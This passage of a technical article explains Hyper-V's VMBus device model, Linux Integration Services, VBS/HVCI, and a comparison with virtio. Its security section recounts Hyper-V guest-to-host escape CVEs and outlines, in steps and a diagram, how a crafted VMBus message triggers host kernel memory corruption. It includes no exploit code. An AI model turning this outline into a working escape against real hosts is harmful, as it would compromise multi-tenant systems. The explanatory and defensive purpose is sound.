&lt;p&gt;The most subtle device class is &lt;code&gt;pci-hyperv&lt;/code&gt;, which exposes a virtual PCIe topology to the guest. The Linux kernel vPCI document [@kernel-vpci] describes the trick: a passthrough device is offered to the guest &lt;em&gt;initially&lt;/em&gt; over VMBus (the channel carries the device&apos;s PCI configuration space and BARs), and once the guest&apos;s vPCI driver has constructed a real PCI device object for it, the device dual-identifies as a normal PCIe device. The vendor driver can then load against it.&lt;/p&gt;
&lt;p&gt;This is the mechanism behind both Hyper-V&apos;s Discrete Device Assignment (DDA) [@ms-dda] and Azure&apos;s Accelerated Networking, which we will return to in Section 8. The DDA planning document is explicit that Microsoft formally supports DDA for &lt;strong&gt;GPUs and NVMe storage&lt;/strong&gt; as device classes; other PCIe devices are &quot;likely to work&quot; but require vendor support.&lt;/p&gt;
&lt;h3&gt;Generation-1 vs Generation-2: a quick decoder&lt;/h3&gt;
&lt;p&gt;Putting the device classes side by side clarifies why the move from Generation-1 to Generation-2 VMs simplified so much:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Element&lt;/th&gt;
&lt;th&gt;Generation-1 VM (legacy)&lt;/th&gt;
&lt;th&gt;Generation-2 VM (since 2013)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Firmware&lt;/td&gt;
&lt;td&gt;BIOS&lt;/td&gt;
&lt;td&gt;UEFI with Secure Boot&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Boot disk&lt;/td&gt;
&lt;td&gt;Emulated IDE&lt;/td&gt;
&lt;td&gt;Synthetic SCSI (&lt;code&gt;storvsc&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network on boot&lt;/td&gt;
&lt;td&gt;Emulated DEC 21140 fallback&lt;/td&gt;
&lt;td&gt;Synthetic NIC (&lt;code&gt;netvsc&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Input&lt;/td&gt;
&lt;td&gt;Emulated PS/2 + &lt;code&gt;vmbusrhid&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;vmbusrhid&lt;/code&gt; only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Display&lt;/td&gt;
&lt;td&gt;Emulated VGA + &lt;code&gt;synthvid&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;synthvid&lt;/code&gt; only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Max boot VHDX&lt;/td&gt;
&lt;td&gt;2 TB&lt;/td&gt;
&lt;td&gt;64 TB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Source&lt;/td&gt;
&lt;td&gt;Microsoft Learn: Gen 1 vs Gen 2 [@ms-gen1-gen2-vms]&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Generation-2 is what the Hyper-V architecture wanted to be from the beginning: an all-synthetic stack with no fallback to imaginary 1990s chipsets. The two-generation existence was not a design preference; it was the cost of supporting older operating systems whose boot loaders only knew about BIOS and IDE. Today, every modern Windows and modern Linux supports Generation-2; Generation-1 remains for legacy guests.&lt;/p&gt;
&lt;h3&gt;Counting boundary crossings&lt;/h3&gt;
&lt;p&gt;The shape of the hot path is now visible. To send one network packet from a guest:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The guest writes one descriptor and one payload copy into the netvsc TX ring (one memory copy).&lt;/li&gt;
&lt;li&gt;The guest possibly fires a doorbell (one hypercall, often suppressed if the host has not caught up).&lt;/li&gt;
&lt;li&gt;The host&apos;s &lt;code&gt;vmswitch.sys&lt;/code&gt; reaps the descriptor, parses it, and forwards it through the virtual switch to a real NIC.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;A single packet&apos;s hot path is &lt;strong&gt;at most one hypercall and one memory copy in the guest&lt;/strong&gt;, plus host-side ring traversal. Section 8&apos;s comparison table will quantify how this stacks up against virtio and SR-IOV, but the scale is clear: paravirt I/O on Hyper-V is orders of magnitude cheaper per packet than full PC emulation, and the gap closes only when you go all the way to hardware passthrough.&lt;/p&gt;
&lt;p&gt;The catalogue is set. Now, who actually wrote the Linux side of all this?&lt;/p&gt;
&lt;h2&gt;5. Linux Integration Services: Microsoft writes Linux drivers&lt;/h2&gt;
&lt;p&gt;In December 2009, Microsoft did something quietly historic. Linux kernel 2.6.32 merged a set of drivers under &lt;code&gt;drivers/staging/hv/&lt;/code&gt;, contributed by Microsoft itself, that taught the Linux kernel to be an enlightened Hyper-V guest. The kernel.org Hyper-V index page [@kernel-hyperv-index] is the maintained landing page for that work. Over the next several releases the drivers moved out of &lt;code&gt;staging/&lt;/code&gt;, settled at &lt;code&gt;drivers/hv/&lt;/code&gt;, &lt;code&gt;drivers/net/hyperv/&lt;/code&gt;, &lt;code&gt;drivers/scsi/storvsc_drv.c&lt;/code&gt;, and &lt;code&gt;drivers/pci/controller/pci-hyperv.c&lt;/code&gt;, and became the default in every mainstream distribution.&lt;/p&gt;
&lt;p&gt;That set of drivers is collectively called &lt;strong&gt;Linux Integration Services (LIS)&lt;/strong&gt;.&lt;/p&gt;

The set of in-kernel Hyper-V guest drivers that Microsoft contributes to upstream Linux. Includes `hv_vmbus` (the VMBus core), `hv_netvsc` (synthetic NIC), `hv_storvsc` (synthetic SCSI), `hv_utils` (KVP, time sync, shutdown, heartbeat, VSS), `pci-hyperv` (vPCI), and `hv_balloon` (memory ballooning). The same code that Microsoft maintains in the Linux tree powers Linux guests on Hyper-V on Windows Server, on Azure, and on developer Hyper-V on Windows 11.
&lt;p&gt;The reason this matters is bigger than convenience. In 2009, Linux had a long, painful history with Hyper-V&apos;s competitors. VMware shipped &lt;code&gt;open-vm-tools&lt;/code&gt; but the deepest paravirt drivers (VMXNET3, PVSCSI) lived in vendor packages. Xen&apos;s PV drivers existed in-tree but their evolution depended on Citrix and the Xen project. By contributing the full driver stack upstream and committing to keep it there, Microsoft chose a different route: they put the &lt;em&gt;spec&lt;/em&gt; (the TLFS) and the &lt;em&gt;implementation&lt;/em&gt; (LIS) in the open at the same time.&lt;/p&gt;

Microsoft did not just publish a hypervisor specification and hope Linux would adopt it. They wrote the Linux drivers themselves and upstreamed them, and then they kept doing it for fifteen years.
&lt;p&gt;You can see the maintenance pattern in any current kernel. The &lt;code&gt;drivers/hv/&lt;/code&gt; directory has continuous commit activity from Microsoft engineers. Kernel-doc files like the VMBus [@kernel-vmbus], clocks [@kernel-clocks], vPCI [@kernel-vpci], overview [@kernel-hyperv-overview], and CoCo VM [@kernel-coco] pages are written by the same engineers who write the drivers. Several of those documents are the most lucid descriptions of the architecture that exist anywhere in public.One unexpected consequence: the Linux kernel docs are often easier to read for the architecture than Microsoft&apos;s own customer-facing docs. The customer docs answer &quot;how do I configure this?&quot;; the kernel docs answer &quot;what is actually happening?&quot; When researching this article, I found that the cleanest single description of VMBus channel lifecycle is the Linux kernel doc, not the TLFS.&lt;/p&gt;
&lt;h3&gt;What &quot;in-box&quot; really means&lt;/h3&gt;
&lt;p&gt;Both major guests now ship VMBus support without any post-install step:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;On Windows, the VMBus client stack is built into every supported Windows version since Windows 7 / Windows Server 2008 R2. The legacy Integration Services package, which once shipped as an ISO you mounted into the VM, is no longer needed on supported Windows.&lt;/li&gt;
&lt;li&gt;On Linux, the drivers are in-tree from kernel 2.6.32 (December 2009) onward and ship in every mainstream distro.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The kernel.org Hyper-V overview document [@kernel-hyperv-overview] explicitly warns against installing legacy LIS packages on top of a kernel that already has the in-tree drivers: it can break MSI-X handling and PCI passthrough. This is the kind of operational footgun that survives precisely because the in-box answer is correct and the LIS package is a holdover from earlier kernels.&lt;/p&gt;
&lt;h3&gt;A practical smoke test&lt;/h3&gt;
&lt;p&gt;You can confirm a Linux guest is using its enlightenments without any vendor tooling. The kernel exposes &lt;code&gt;cpuid&lt;/code&gt; leaves and Hyper-V detection through &lt;code&gt;dmesg&lt;/code&gt; and through &lt;code&gt;/sys&lt;/code&gt;. A small script makes it concrete:&lt;/p&gt;
&lt;p&gt;{&lt;code&gt; // This logic mirrors what \&lt;/code&gt;dmesg | grep -i hyperv` and a peek into
// /sys/devices/virtual/misc/vmbus would tell you on a real Linux Hyper-V guest.&lt;/p&gt;
&lt;p&gt;const guestObservations = {
  cpuidSig: &apos;0x40000000&apos;,         // Microsoft&apos;s vendor signature for Hyper-V
  guestOsIdMsr: 0x40000000,       // HV_X64_MSR_GUEST_OS_ID, written by the guest
  hypercallMsr: 0x40000001,       // HV_X64_MSR_HYPERCALL, returns the hypercall page
  vmbusModuleLoaded: true,
  netvscDevice: &apos;/sys/class/net/eth0/device/driver&apos;,
  netvscDriverName: &apos;hv_netvsc&apos;,
  storvscModuleLoaded: true,
};&lt;/p&gt;
&lt;p&gt;function isEnlightenedHyperVGuest(o) {
  if (o.cpuidSig !== &apos;0x40000000&apos;) return false;
  if (!o.vmbusModuleLoaded) return false;
  if (o.netvscDriverName !== &apos;hv_netvsc&apos;) return false;
  return true;
}&lt;/p&gt;
&lt;p&gt;console.log(
  isEnlightenedHyperVGuest(guestObservations)
    ? &apos;Yes: Hyper-V enlightened, using netvsc + storvsc&apos;
    : &apos;No: running on emulated PC hardware or non-Hyper-V hypervisor&apos;
);
`}&lt;/p&gt;
&lt;p&gt;The point is not the script itself (anyone can write a few lines of &lt;code&gt;awk&lt;/code&gt; against &lt;code&gt;dmesg&lt;/code&gt;); it is that the verification surface is &lt;em&gt;public&lt;/em&gt;. The CPU vendor signature, the MSRs, the kernel module names, the &lt;code&gt;/sys&lt;/code&gt; paths are all documented. There is nothing to reverse-engineer.&lt;/p&gt;
&lt;h3&gt;Why this earned trust&lt;/h3&gt;
&lt;p&gt;Two pieces of practical evidence persuaded the Linux community that LIS was not a strategic trap:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;The drivers stayed upstream.&lt;/strong&gt; From 2009 to the present, Microsoft has maintained the &lt;code&gt;drivers/hv/&lt;/code&gt; tree, responded to maintainer feedback, and shipped patches through the normal kernel process.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The TLFS stayed accurate.&lt;/strong&gt; Successive Hyper-V releases either matched what the TLFS said or updated the TLFS. There was no second, secret protocol.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The combination put Microsoft in the unusual position of being the most open hypervisor vendor for Linux guest support. (VirtIO on KVM has a richer cross-vendor story; that comparison is Section 8.) This open posture is also what set up the 2024 OpenVMM open-sourcing as a credible move rather than a stunt.&lt;/p&gt;
&lt;p&gt;But before we get to OpenVMM, we need to look at a different way Hyper-V matters: not just as a substrate for VMs, but as a substrate for in-VM security boundaries inside Windows itself.&lt;/p&gt;
&lt;h2&gt;6. VBS and HVCI: Hyper-V as the trust anchor inside Windows&lt;/h2&gt;
&lt;p&gt;Up to this point the article has treated Hyper-V as a virtualization product: a thing that hosts VMs. Starting in Windows 10 and Windows Server 2016 [@ms-server-2016], Microsoft began using the same hypervisor for a different job: enforcing security boundaries inside a single OS install. The umbrella name is &lt;strong&gt;Virtualization-Based Security (VBS)&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The mechanism is simple in description and subtle in consequences. The hypervisor splits a single guest&apos;s address space into two &lt;strong&gt;Virtual Trust Levels (VTLs)&lt;/strong&gt;. The lower one, VTL0, runs the normal Windows kernel and user mode (this is where &lt;code&gt;explorer.exe&lt;/code&gt; and your browser live). The higher one, VTL1, runs a much smaller stack called the &lt;strong&gt;Secure Kernel&lt;/strong&gt; plus a set of isolated user-mode services called &lt;strong&gt;trustlets&lt;/strong&gt;. A compromise of VTL0, even of &lt;code&gt;ntoskrnl.exe&lt;/code&gt;, cannot read or write VTL1 memory because the hypervisor enforces that boundary using the same hardware machinery (Intel EPT / AMD NPT, plus Intel VT-d / AMD-Vi for DMA) that it uses to isolate one VM from another.&lt;/p&gt;

A Hyper-V construct that partitions a single guest&apos;s address space into multiple privilege tiers enforced by the hypervisor. VTL0 hosts the normal kernel and user mode; VTL1 hosts the Secure Kernel and trustlets. The hypervisor presents each VTL with its own separate set of memory mappings, system registers, and interrupt state, so code running at VTL0 cannot read VTL1&apos;s memory even if it has run-as-NT-AUTHORITY-SYSTEM privilege.

flowchart TD
    HV[&quot;Hyper-V hypervisor&quot;]
    subgraph Guest[&quot;A single Windows guest&quot;]
        subgraph VTL0[&quot;VTL0 (normal world)&quot;]
            User0[&quot;User mode: apps&quot;]
            Kernel0[&quot;NT kernel&quot;]
        end
        subgraph VTL1[&quot;VTL1 (secure world)&quot;]
            SK[&quot;Secure Kernel&quot;]
            Trustlets[&quot;Trustlets: LSAIso, BIOiso, ...&quot;]
        end
    end
    HV --&amp;gt; Guest
    HV -. &quot;EPT + IOMMU enforcement&quot; .-&amp;gt; VTL0
    HV -. &quot;EPT + IOMMU enforcement&quot; .-&amp;gt; VTL1
    Kernel0 -. &quot;VTL switch (hypercall)&quot; .-&amp;gt; SK
&lt;h3&gt;What lives in VTL1&lt;/h3&gt;
&lt;p&gt;The flagship inhabitant of VTL1 is &lt;strong&gt;Hypervisor-protected Code Integrity (HVCI)&lt;/strong&gt;, which moves kernel-mode page-table integrity checking into the Secure Kernel. With HVCI on, no VTL0 driver can mark a kernel page as both writable and executable; the Secure Kernel mediates the page tables and refuses the request. The result is that attackers who already have code execution in the NT kernel cannot trivially load arbitrary unsigned kernel code or build new executable JIT pages on the fly.&lt;/p&gt;
&lt;p&gt;The other tenants of VTL1 are &lt;strong&gt;trustlets&lt;/strong&gt;. The most familiar is &lt;code&gt;lsaiso.exe&lt;/code&gt; (LSA Isolation), which holds the cached domain credentials that historically lived in &lt;code&gt;lsass.exe&lt;/code&gt; and were the prime target for tools like Mimikatz. With Credential Guard on, those secrets move to a trustlet whose memory is unreadable from VTL0; even SYSTEM-level malware in the normal world cannot extract them. Other trustlets handle biometric template storage, key isolation for code integrity policy, and similar small, security-sensitive workloads.&lt;/p&gt;
&lt;h3&gt;Why the hypervisor is the right place for this&lt;/h3&gt;
&lt;p&gt;Putting these protections inside the hypervisor rather than inside the kernel has a property that no in-kernel mitigation can match: &lt;strong&gt;the protected component does not share an address space with the attacker&lt;/strong&gt;. A defence built inside &lt;code&gt;ntoskrnl.exe&lt;/code&gt; (&lt;code&gt;PatchGuard&lt;/code&gt;, &lt;code&gt;KASLR&lt;/code&gt;, control-flow guard) lives in the same memory the attacker is trying to corrupt. A defence built inside VTL1 lives in memory the attacker cannot touch, because the page tables that map it are themselves invisible from VTL0.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Pre-VBS Windows had decades of memory-safety bugs in the NT kernel. After VBS, exploiting one of those bugs no longer immediately yields the attacker the ability to read LSASS secrets or load arbitrary kernel code. The attacker now needs a &lt;em&gt;second&lt;/em&gt; bug, in the much smaller Secure Kernel codebase. The defender&apos;s effective budget went up by a large multiplier without rewriting a single line of NT.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;How this connects back to VMBus&lt;/h3&gt;
&lt;p&gt;VBS would not be possible without the work the previous sections described. The Secure Kernel is what runs in VTL1; it needs to communicate with VTL0 for ordinary system services (the &lt;code&gt;lsaiso.exe&lt;/code&gt; process must respond to authentication requests from VTL0 callers, the HVCI mediator must answer page-table requests, and so on). The signalling and shared-memory primitives that make those calls cheap are the same SynIC and shared-page primitives that VMBus uses between partitions.&lt;/p&gt;
&lt;p&gt;In other words, the architecture Microsoft built in 2008 to give a Windows VM a fast network card became, in 2016, the architecture that gives a single Windows install a security boundary stronger than its own kernel. The same hypervisor, the same trust-mediation primitives, two completely different applications.&lt;/p&gt;
&lt;p&gt;Windows Server 2019 [@ms-server-2019] extended this further with Hyper-V isolation for containers, where a container&apos;s lightweight VM gets its own kernel inside a tiny VTL0 of its own. The pattern is consistent: every time Windows wanted a stronger isolation primitive, the answer was &quot;use the hypervisor.&quot;&lt;/p&gt;
&lt;p&gt;This dual-use is the reason a serious Windows security review touches the Hyper-V codebase even on machines that nobody thinks of as virtualization hosts. A Hyper-V escape (a guest-to-host VMBus exploit) is not just &quot;an exploit against Azure&quot;; it is also, on a typical Windows 11 desktop with VBS enabled, an exploit against the boundary that protects LSASS secrets from kernel-mode malware.&lt;/p&gt;
&lt;p&gt;That makes the next section&apos;s question urgent: how strong is the VMBus boundary, in practice?&lt;/p&gt;
&lt;h2&gt;7. VMBus security: every message is a parser at the trust boundary&lt;/h2&gt;
&lt;p&gt;Here is the part of the architecture worth being honest about. The same property that makes VMBus fast, namely that the host-side VSP runs in the root partition&apos;s kernel and parses guest-supplied bytes directly, also makes the VSP the most consequential piece of attack surface in the entire stack. Microsoft itself prices it that way: the Hyper-V Bug Bounty Program [@ms-bounty-hyperv] pays up to &lt;strong&gt;USD 250,000&lt;/strong&gt; specifically for guest-to-host escapes that hit this surface, which is among the highest payouts Microsoft offers for any category of vulnerability.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every byte that crosses a VMBus channel from a guest is a byte that a kernel-mode parser in the most privileged partition on the host has to interpret. The performance argument for a software data plane and the security argument against it are the same argument, looked at from opposite directions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The historical record&lt;/h3&gt;
&lt;p&gt;Three CVEs make the pattern concrete:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;CVE-2017-0075&lt;/strong&gt; is the Hyper-V escape that the Qihoo 360 Vulcan Team demonstrated at Pwn2Own 2017. The NVD entry [@nvd-cve-2017-0075] describes it as a Hyper-V flaw that &quot;allows guest OS users to execute arbitrary code on the host OS via a crafted application.&quot; The reachable code was in a VMBus message handler on the host side.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;CVE-2021-28476&lt;/strong&gt; is the canonical example. The NVD record [@nvd-cve-2021-28476] classifies it as a critical Hyper-V remote code execution vulnerability with a CVSS score of 9.9. The Akamai writeup with Guardicore and SafeBreach [@akamai-cve-2021-28476] traces the bug to &lt;code&gt;vmswitch.sys&lt;/code&gt;, the synthetic-NIC VSP, and shows it had been present in production since the August 2019 vmswitch build. The exploit primitive is exactly what the architecture invites: a guest crafts an OID-style RNDIS request, sends it through the netvsc VMBus channel, and the host&apos;s kernel parser misvalidates a length, producing memory corruption in the most privileged kernel on the box.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;CVE-2024-21407&lt;/strong&gt; is a more recent Hyper-V remote code execution vulnerability patched in March 2024 (NVD [@nvd-cve-2024-21407]). Its existence demonstrates that the bug class did not vanish; the same shape (guest-controlled message, host kernel parser, escalation to host code execution) keeps reappearing.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;

The MSRC bounty page ranges from \$5,000 for low-impact bugs to \$250,000 for full guest-to-host escapes (Microsoft bounty page [@ms-bounty-hyperv]). That price point is not a marketing number; it is Microsoft signalling what its threat model says these bugs are worth. A defender pricing their own controls should treat any VSP code path that parses guest-controlled data as a category that justifies the same level of attention as remote internet-facing services.
&lt;h3&gt;Why the bug class is structural&lt;/h3&gt;
&lt;p&gt;The pattern in all three CVEs is the same:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A guest writes carefully crafted bytes into a VMBus channel ring.&lt;/li&gt;
&lt;li&gt;The guest fires the doorbell.&lt;/li&gt;
&lt;li&gt;The host&apos;s VSP, running in the root partition&apos;s kernel, dequeues the message.&lt;/li&gt;
&lt;li&gt;The VSP parses the message in C or C++ kernel code.&lt;/li&gt;
&lt;li&gt;A memory-safety mistake (length confusion, missing bounds check, integer overflow) becomes a write or read primitive in the host kernel.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;There is no exotic mechanism here. The exploit surface is &quot;kernel C code parsing untrusted input,&quot; which has been the dominant source of remote-code-execution bugs in operating systems since the 1990s. The novelty is the location: the parser sits below the most privileged supervisor on the box, with full access to every other tenant&apos;s memory.&lt;/p&gt;

sequenceDiagram
    participant Mal as Malicious guest VM
    participant Ring as VMBus ring (shared memory)
    participant SInt as Synthetic Interrupt Controller
    participant VSP as Host VSP (e.g., vmswitch.sys, kernel)
    Mal-&amp;gt;&amp;gt;Ring: Write crafted RNDIS-style message
    Mal-&amp;gt;&amp;gt;SInt: Hypercall: signal channel event
    SInt--&amp;gt;&amp;gt;VSP: SINT delivered on host CPU
    VSP-&amp;gt;&amp;gt;Ring: Read message header
    note over VSP: Length confusion / missing bounds check
    VSP-&amp;gt;&amp;gt;VSP: Out-of-bounds write in root partition kernel
    note over VSP: Result: arbitrary code in the most privileged partition
&lt;h3&gt;Mitigations short of a rewrite&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s first line of defence is the same one every kernel team uses: ASLR, control-flow integrity, kernel hardening, fuzzing the parsers, code review of every new device class, and, on Azure specifically, isolating each tenant&apos;s compute hypervisor so a single compromised host does not become a multi-tenant disaster. The MSRC bounty program is partly a procurement mechanism for this same effort: pay researchers to find and report bugs before attackers find them in the wild.&lt;/p&gt;
&lt;p&gt;A second line of defence is &lt;strong&gt;Generation-2 VMs&lt;/strong&gt; (Microsoft Learn [@ms-gen1-gen2-vms]), which remove the legacy emulators (IDE, PS/2, PIC) from the host data path entirely. Every emulator removed is one fewer parser in the most privileged kernel.&lt;/p&gt;
&lt;p&gt;A third is the Microsoft Hyper-V architecture page [@ms-hyperv-architecture-perf]&apos;s &quot;minimise root-partition exposure&quot; guidance: configure hosts with the smallest set of root-partition services that the workload requires, since every service is potential surface.&lt;/p&gt;
&lt;p&gt;These all help, but none of them change the structural fact that VSPs parse guest-controlled data in C/C++ kernel code. The next architectural shift, the one that does change that fact, is what Section 9 is about.&lt;/p&gt;
&lt;h3&gt;Side channels and the Spectre era&lt;/h3&gt;
&lt;p&gt;VMBus also has to defend against side-channel attacks across the partition boundary. The same Spectre / Meltdown / L1TF mitigations that apply to a multi-tenant hypervisor in general apply to Hyper-V specifically. Microsoft&apos;s broader hypervisor mitigation strategy interacts with VMBus mostly indirectly: the SynIC, the hypercall page, and the timer subsystem all needed audit and adjustment when these classes of attacks emerged. The detail is largely outside the scope of an article about the device model, but the takeaway is consistent with the rest of this section: any shared CPU resource between partitions is a potential attack surface, and &quot;shared via the hypervisor&apos;s bus&quot; is no exception.&lt;/p&gt;
&lt;p&gt;The structural answer to all of this, the one Microsoft itself has been working toward, is to change the languages and the trust boundaries. To set that up, the next section first widens the field by comparing VMBus to its peer in the KVM world, virtio.&lt;/p&gt;
&lt;h2&gt;8. VMBus vs virtio: two answers to the same question&lt;/h2&gt;
&lt;p&gt;Hyper-V is not the only hypervisor with a paravirt I/O story. The KVM world evolved its own answer to the same problem at roughly the same time, and it ended up with a different design with different trade-offs. The standard is &lt;strong&gt;virtio&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The original virtio paper, Rusty Russell&apos;s &quot;virtio: Towards a De-Facto Standard For Virtual I/O Devices&quot; [@rusty-virtio-paper], was published at OLS 2008, the same year Hyper-V shipped. The proposal was explicit in its motivation: every hypervisor was reinventing paravirt drivers, and a single hypervisor-independent specification could let one guest driver work everywhere. OASIS later standardised virtio 1.0 in 2016, then virtio 1.1 in 2019 [@oasis-virtio-1-1], then virtio 1.2 as a Committee Specification in 2023 [@oasis-virtio-1-2].&lt;/p&gt;

A hypervisor-independent paravirtual I/O specification, governed by OASIS. A virtio device is presented to the guest over a transport (PCI, MMIO, or s390 channel I/O) that advertises capability bits. The data plane is a generic ring layout called a **virtqueue**: a ring of descriptors, an `avail` ring (guest-to-host), and a `used` ring (host-to-guest). Each device class (virtio-net, virtio-blk, virtio-scsi, virtio-fs, virtio-gpu) defines its own message format on top of virtqueues.
&lt;h3&gt;The same shape, viewed sideways&lt;/h3&gt;
&lt;p&gt;Architecturally, virtio and VMBus are sibling answers to the same shaped problem.&lt;/p&gt;

flowchart LR
    subgraph virtio_pci[&quot;virtio over PCI&quot;]
        gv[&quot;Guest virtio driver&quot;]
        vq[&quot;virtqueue (descriptors + avail + used)&quot;]
        host_be[&quot;Host backend (vhost-net, vhost-user, OpenVMM)&quot;]
        gv -- &quot;PIO doorbell write&quot; --&amp;gt; host_be
        gv -- &quot;shared memory&quot; --- vq
        host_be -- &quot;shared memory&quot; --- vq
        host_be -- &quot;MSI-X&quot; --&amp;gt; gv
    end
    subgraph vmbus[&quot;Hyper-V VMBus&quot;]
        gv2[&quot;Guest VSC&quot;]
        ring[&quot;Two ring buffers + GPADL&quot;]
        vsp[&quot;Host VSP (kernel)&quot;]
        gv2 -- &quot;Hypercall doorbell&quot; --&amp;gt; vsp
        gv2 -- &quot;shared memory&quot; --- ring
        vsp -- &quot;shared memory&quot; --- ring
        vsp -- &quot;SINT&quot; --&amp;gt; gv2
    end
&lt;p&gt;Both:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use &lt;strong&gt;shared-memory rings&lt;/strong&gt; for payload.The phrase &quot;shared-memory rings&quot; hides a small subtlety: a ring buffer is a circular buffer with separate read and write indices. Producer and consumer can run concurrently as long as they only touch their own index, which is what makes ring buffers a wait-free communication primitive on cache-coherent hardware.&lt;/li&gt;
&lt;li&gt;Use a &lt;strong&gt;doorbell&lt;/strong&gt; for signalling.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Batch&lt;/strong&gt; many requests per doorbell so per-message hypercall cost amortises.&lt;/li&gt;
&lt;li&gt;Have &lt;strong&gt;per-class device protocols&lt;/strong&gt; layered on top of a common transport.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The differences are where the world bites:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;VMBus&lt;/th&gt;
&lt;th&gt;virtio (1.2)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Transport&lt;/td&gt;
&lt;td&gt;Software-only &quot;bus&quot;, channel offer/open/close&lt;/td&gt;
&lt;td&gt;PCI, MMIO, s390 channel I/O&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Doorbell&lt;/td&gt;
&lt;td&gt;Hypercall (&lt;code&gt;HV_SIGNAL_EVENT&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;PIO write to a doorbell BAR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reverse signal&lt;/td&gt;
&lt;td&gt;Synthetic interrupt (SINT)&lt;/td&gt;
&lt;td&gt;MSI-X&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Standardisation&lt;/td&gt;
&lt;td&gt;Microsoft-owned, Open Specification Promise [@ms-tlfs]&lt;/td&gt;
&lt;td&gt;OASIS-ratified, multi-vendor&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows in-box drivers&lt;/td&gt;
&lt;td&gt;Yes, every supported version&lt;/td&gt;
&lt;td&gt;No; out-of-box signed VirtIO INFs from cloud vendors&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Device classes beyond I/O&lt;/td&gt;
&lt;td&gt;Yes: KVP, time sync, VSS, balloon&lt;/td&gt;
&lt;td&gt;Limited; non-I/O often built on virtio-vsock or out-of-band agents&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-hypervisor portability&lt;/td&gt;
&lt;td&gt;Hyper-V only&lt;/td&gt;
&lt;td&gt;Universal: KVM, QEMU, Cloud Hypervisor, Firecracker, Xen HVM, OpenVMM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Spec governance&lt;/td&gt;
&lt;td&gt;Single vendor under OSP&lt;/td&gt;
&lt;td&gt;Multi-vendor with formal conformance clauses&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Source for Linux side&lt;/td&gt;
&lt;td&gt;drivers/hv/ [@kernel-hyperv-index]&lt;/td&gt;
&lt;td&gt;drivers/virtio in the Linux tree&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;Where each design wins&lt;/h3&gt;
&lt;p&gt;Virtio&apos;s strongest claim is portability. The same Linux guest VM image, with the same in-tree virtio drivers, runs on KVM, QEMU, Cloud Hypervisor, AWS Firecracker, and (since 2024) Microsoft&apos;s own OpenVMM, which added virtio backend support. A workload that has to move between cloud providers benefits from this directly: the guest does not need a different driver stack per host.&lt;/p&gt;
&lt;p&gt;Virtio also has a richer multi-vendor governance story. The spec is OASIS-ratified, with explicit conformance clauses; multiple commercial hypervisors implement it; multiple SmartNIC vendors implement virtio data planes in hardware (the &lt;code&gt;vDPA&lt;/code&gt; and &lt;code&gt;VDUSE&lt;/code&gt; work, described by Red Hat [@redhat-vdpa] and the Linux kernel VDUSE doc [@kernel-vduse]).&lt;/p&gt;
